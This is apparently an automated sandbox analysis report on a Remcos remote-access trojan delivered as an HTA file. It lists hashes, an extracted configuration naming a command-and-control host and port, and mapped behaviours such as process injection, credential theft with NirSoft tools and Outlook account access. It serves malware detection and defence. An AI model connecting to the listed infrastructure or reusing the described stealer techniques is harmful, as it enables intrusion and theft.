remcos | 8b1b3e1f69d6d339e2b77e1610457544b1774eb184b53b490d37e17667c4dd68

Analysis

max time kernel
150s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20250211-en
resource tags

arch:x64arch:x86image:win10v2004-20250211-enlocale:en-usos:windows10-2004-x64system
submitted
12-02-2025 19:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

createdbestthingswithbetterwaysgivemebestfor.hta
Size

13KB
MD5

716aaf1d9cad7adc83165137b0908eef
SHA1

0f14cba90b4ff8c0e096c514692b31e402d456f3
SHA256

8b1b3e1f69d6d339e2b77e1610457544b1774eb184b53b490d37e17667c4dd68
SHA512

39026bcce661a0ed079419732d3acf97ed815f33fc9b29bc5c5013aa0fa5ef82d5a41f66a2b3e104feaa7b2752f0b22b65fcebe02122b4ef48d01387f20a7ec1
SSDEEP

48:3vUzyAm9euUzyLKm9elka93UDmCKpy4MOFpNrnUzygSUzyURxx/m9esvUzyhPG:ctj9AH6F7n2TXw+

Score

10^/10

remcos remotehost adware collection defense_evasion discovery execution persistence privilege_escalation rat stealer

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

ugobelube.duckdns.org:1213

Attributes

audio_folder
MicRecords
audio_path
ApplicationPath
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-BASV1H
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos

Detected Nirsoft tools 3 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

resource	yara_rule
behavioral2/memory/3212-110-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral2/memory/5116-107-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral2/memory/4472-106-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft

NirSoft MailPassView 1 IoCs

Password recovery tool for various email clients

resource	yara_rule
behavioral2/memory/4472-106-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral2/memory/5116-107-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Blocklisted process makes network request 3 IoCs

flow	pid	Process
6	4448	powershell.exe
17	992	powershell.exe
25	992	powershell.exe

Boot or Logon Autostart Execution: Active Setup 2 TTPs 7 IoCs

Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

persistence

Active Setup

T1547.014

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE}\Localized Name = "Microsoft Edge"	setup.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE}\IsInstalled = "1"	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE}\Version = "43,0,0,0"	setup.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components	setup.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE}	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE}\ = "Microsoft Edge"	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE}\StubPath = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\133.0.3065.59\\Installer\\setup.exe\" --configure-user-settings --verbose-logging --system-level --msedge --channel=stable"	setup.exe

Downloads MZ/PE file 1 IoCs

flow	pid	Process
33	1736	Process not Found

Evasion via Device Credential Deployment 1 IoCs

defense_evasion execution

pid	Process
4448	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2656314083-4170277356-267438488-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2656314083-4170277356-267438488-1000\Control Panel\International\Geo\Nation	WScript.exe

Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
persistence privilege_escalation

Component Object Model Hijacking
T1546.015

Executes dropped EXE 10 IoCs

pid	Process
4720	setup.exe
3968	setup.exe
1204	setup.exe
712	setup.exe
4268	setup.exe
2452	setup.exe
5020	setup.exe
2212	setup.exe
2156	setup.exe
3644	setup.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2656314083-4170277356-267438488-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	CasPol.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
992	powershell.exe

Installs/modifies Browser Helper Object 2 TTPs 8 IoCs

BHOs are DLL modules which act as plugins for Internet Explorer.

stealer adware

Modify Registry

T1112

Browser Extensions

T1176

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects	setup.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\	setup.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects	setup.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\ = "IEToEdge BHO"	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\ = "IEToEdge BHO"	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\NoExplorer = "1"	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\NoExplorer = "1"	setup.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Microsoft Edge.lnk	setup.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 992 set thread context of 3332	992	powershell.exe	100
PID 3332 set thread context of 5116	3332	CasPol.exe	105
PID 3332 set thread context of 4472	3332	CasPol.exe	107
PID 3332 set thread context of 3212	3332	CasPol.exe	108

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\ug.pak	setup.exe
File created	C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\identity_proxy\win11\identity_helper.Sparse.Dev.msix	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\VisualElements\SmallLogo.png	setup.exe
File created	C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\kok.pak	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\prefs_enclave_x64.dll	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\lv.pak	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\th.pak	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\identity_proxy\win10\identity_helper.Sparse.Internal.msix	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\AdSelectionAttestationsPreloaded\ad-selection-attestations.dat	setup.exe
File created	C:\Program Files (x86)\Microsoft\Edge\Temp\source4720_1729777645\MSEDGE.7z	setup.exe
File created	C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\delegatedWebFeatures.sccd	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\ml.pak	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\MEIPreload\manifest.json	setup.exe
File created	C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe	setup.exe
File created	C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\identity_proxy\resources.pri	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Trust Protection Lists\Sigma\Advertising	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Trust Protection Lists\manifest.json	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\ne.pak	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Locales\it.pak	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Locales\te.pak	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Locales\zh-CN.pak	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\edge_feedback\mf_trace.wprp	setup.exe
File created	C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\cookie_exporter.exe	setup.exe
File created	C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\mr.pak	setup.exe
File opened for modification	C:\Program Files\MsEdgeCrashpad\throttle_store.dat	setup.exe
File opened for modification	C:\Program Files\msedge_installer.log	setup.exe
File created	C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\fi.pak	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Locales\es.pak	setup.exe
File created	C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\fr.pak	setup.exe
File created	C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\AdSelectionAttestationsPreloaded\ad-selection-attestations.dat	setup.exe
File created	C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\de.pak	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\icudtl.dat	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\el.pak	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\zh-CN.pak	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\identity_proxy\dev.identity_helper.exe.manifest	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\MEIPreload\preloaded_data.pb	setup.exe
File opened for modification	C:\Program Files\MsEdgeCrashpad\throttle_store.dat	setup.exe
File opened for modification	C:\Program Files\MsEdgeCrashpad\metadata	setup.exe
File created	C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\identity_proxy\win10\identity_helper.Sparse.Beta.msix	setup.exe
File opened for modification	C:\Program Files\MsEdgeCrashpad\metadata	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Installer\setup.exe	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\msedge.dll	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\mt.pak	setup.exe
File created	C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\d3dcompiler_47.dll	setup.exe
File created	C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\ca-Es-VALENCIA.pak	setup.exe
File created	C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Trust Protection Lists\Sigma\Fingerprinting	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\learning_tools.dll	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\uk.pak	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\EBWebView\x64\EmbeddedBrowserWebView.dll	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\AdSelectionAttestationsPreloaded\manifest.json	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Locales\et.pak	setup.exe
File created	C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\af.pak	setup.exe
File created	C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\telclient.dll	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\sl.pak	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Locales\sk.pak	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\identity_proxy\win11\identity_helper.Sparse.Internal.msix	setup.exe
File created	C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\AdSelectionAttestationsPreloaded\manifest.json	setup.exe
File created	C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\dual_engine_adapter_x64.dll	setup.exe
File created	C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\msedge_proxy.exe	setup.exe
File created	C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\te.pak	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Locales\ta.pak	setup.exe
File created	C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\hu.pak	setup.exe
File created	C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\ja.pak	setup.exe
File created	C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\vi.pak	setup.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 12 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MicrosoftEdgeUpdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
1628	MicrosoftEdgeUpdate.exe

Modifies Internet Explorer settings 1 TTPs 26 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\ = "IEToEdge Handler"	setup.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\ProtocolExecute\microsoft-edge	setup.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\EnterpriseMode\MSEdgePath = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application"	setup.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights	setup.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\ = "IEToEdge Handler"	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\AppPath = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\133.0.3065.59\\BHO"	setup.exe
Key created	\REGISTRY\USER\S-1-5-21-2656314083-4170277356-267438488-1000\Software\Microsoft\Internet Explorer\GPU	wwahost.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Main	setup.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Main\EnterpriseMode	setup.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}	setup.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EdgeIntegration	setup.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EdgeIntegration\AdapterLocations	setup.exe
Key created	\REGISTRY\USER\S-1-5-21-2656314083-4170277356-267438488-1000\SOFTWARE\Microsoft\Internet Explorer\GPU	wwahost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}	setup.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\Policy = "3"	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\AppPath = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\133.0.3065.59\\BHO"	setup.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\Policy = "3"	setup.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\ProtocolExecute	setup.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\microsoft-edge	setup.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\EdgeIntegration\AdapterLocations\C:\Program Files (x86)\Microsoft\Edge\Application = "1"	setup.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\AppName = "ie_to_edge_stub.exe"	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\AppName = "ie_to_edge_stub.exe"	setup.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Edge	setup.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Edge\InstallerPinned = "0"	setup.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{31575964-95F7-414B-85E4-0E9A93699E13}	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.xhtml\OpenWithProgIds\MSEdgeHTM	setup.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\Implemented Categories\	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\MSEdgeHTM\DefaultIcon\ = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\133.0.3065.59\\msedge.exe,0"	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\MSEdgePDF\shell\runas\ProgrammaticAccessOnly	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\MSEdgePDF\Application\AppUserModelId = "MSEdge"	setup.exe
Key created	\REGISTRY\MACHINE\Software\Classes\.xht\OpenWithProgids	setup.exe
Key created	\REGISTRY\USER\S-1-5-21-2656314083-4170277356-267438488-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftofficehub_8wekyb3d8bbwe\Internet Explorer	wwahost.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{628ACE20-B77A-456F-A88D-547DB6CEEDD5}	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\ = "IEToEdge BHO"	setup.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\Implemented Categories\{59FB2056-D625-48D0-A944-1A85B5AB2640}\	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\text/html\Extension = ".htm"	setup.exe
Key created	\REGISTRY\MACHINE\Software\Classes\.shtml	setup.exe
Key created	\REGISTRY\MACHINE\Software\Classes\.xhtml	setup.exe
Key created	\REGISTRY\USER\S-1-5-21-2656314083-4170277356-267438488-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftofficehub_8wekyb3d8bbwe\Internet Settings\Cache\History	wwahost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C9C2B807-7731-4F34-81B7-44FF7779522B}\TypeLib\ = "{C9C2B807-7731-4F34-81B7-44FF7779522B}"	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\ie_to_edge_bho.IEToEdgeBHO\CLSID\ = "{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}"	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{3A84F9C2-6164-485C-A7D9-4B27F8AC009E}\ = "PDF Preview Handler"	setup.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\microsoft-edge	setup.exe
Key created	\REGISTRY\MACHINE\Software\Classes\MSEdgeMHT\DefaultIcon	setup.exe
Key created	\REGISTRY\MACHINE\Software\Classes\.svg\OpenWithProgids	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C9C2B807-7731-4F34-81B7-44FF7779522B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{C9C2B807-7731-4F34-81B7-44FF7779522B}\1.0\ = "TypeLib for Interface {C9C2B807-7731-4F34-81B7-44FF7779522B}"	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\TypeLib\ = "{2397ECFE-3237-400F-AE51-62B25B3F15B5}"	setup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2656314083-4170277356-267438488-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftofficehub_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:"	wwahost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{628ACE20-B77A-456F-A88D-547DB6CEEDD5}\AppId = "{628ACE20-B77A-456F-A88D-547DB6CEEDD5}"	setup.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\CLASSES\MIME\Database\Content Type\	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\MSEdgePDF\AppUserModelId = "MSEdge"	setup.exe
Key created	\REGISTRY\MACHINE\Software\Classes\.mhtml\OpenWithProgids	setup.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Interface\{C9C2B807-7731-4F34-81B7-44FF7779522B}\TypeLib	setup.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\	setup.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\microsoft-edge\shell\open	setup.exe
Key created	\REGISTRY\USER\S-1-5-21-2656314083-4170277356-267438488-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftofficehub_8wekyb3d8bbwe\Internet Explorer\EdpDomStorage\office.com	wwahost.exe
Key created	\REGISTRY\MACHINE\Software\Classes\TypeLib\{C9C2B807-7731-4F34-81B7-44FF7779522B}\1.0\0	setup.exe
Key created	\REGISTRY\MACHINE\Software\Classes\MSEdgePDF\shell\open	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\MSEdgeMHT\Application\AppUserModelId = "MSEdge"	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\MSEdgeMHT\Application\ApplicationDescription = "Browse the web"	setup.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{628ACE20-B77A-456F-A88D-547DB6CEEDD5}	setup.exe
Key created	\REGISTRY\MACHINE\Software\Classes\CLSID\{1FCBE96C-1697-43AF-9140-2897C7C69767}	setup.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\ProgID\	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\VersionIndependentProgID\ = "ie_to_edge_bho.IEToEdgeBHO"	setup.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\text/html	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\MSEdgePDF\shell\runas\command\ = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --do-not-de-elevate --single-argument %1"	setup.exe
Key created	\REGISTRY\MACHINE\Software\Classes\MSEdgePDF\Application	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{C9C2B807-7731-4F34-81B7-44FF7779522B}\1.0\0\win32\ = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\133.0.3065.59\\elevation_service.exe"	setup.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\AppID\ie_to_edge_bho.dll\	setup.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\TypeLib\	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\MSEdgeHTM\Application\ApplicationName = "Microsoft Edge"	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\MSEdgeHTM\Application\ApplicationDescription = "Browse the web"	setup.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\CLASSES\MIME	setup.exe
